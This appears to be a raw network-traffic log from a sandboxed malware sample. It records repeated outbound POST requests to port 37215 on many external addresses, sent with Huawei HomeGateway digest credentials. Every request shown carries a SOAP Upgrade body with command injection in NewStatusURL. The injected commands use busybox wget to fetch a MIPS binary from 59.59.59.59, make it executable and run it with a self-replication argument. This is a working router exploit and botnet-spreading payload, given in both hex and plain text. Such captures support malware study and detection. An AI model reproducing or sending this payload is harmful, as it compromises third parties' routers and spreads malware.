                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          707192.168.2.1546600197.25.73.18837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.643819094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          708192.168.2.155363041.46.85.20137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.643837929 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          709192.168.2.154243841.8.246.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.643860102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          710192.168.2.1559234122.240.111.6437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.644040108 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          711192.168.2.1555404157.191.255.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.644063950 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          712192.168.2.1545742197.44.134.15937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.644082069 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          713192.168.2.1544950197.158.125.20137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.644104004 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          714192.168.2.1559760197.215.170.5137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.644118071 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          715192.168.2.153880863.205.244.7637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.644138098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          716192.168.2.1555578197.28.253.6337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.644221067 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
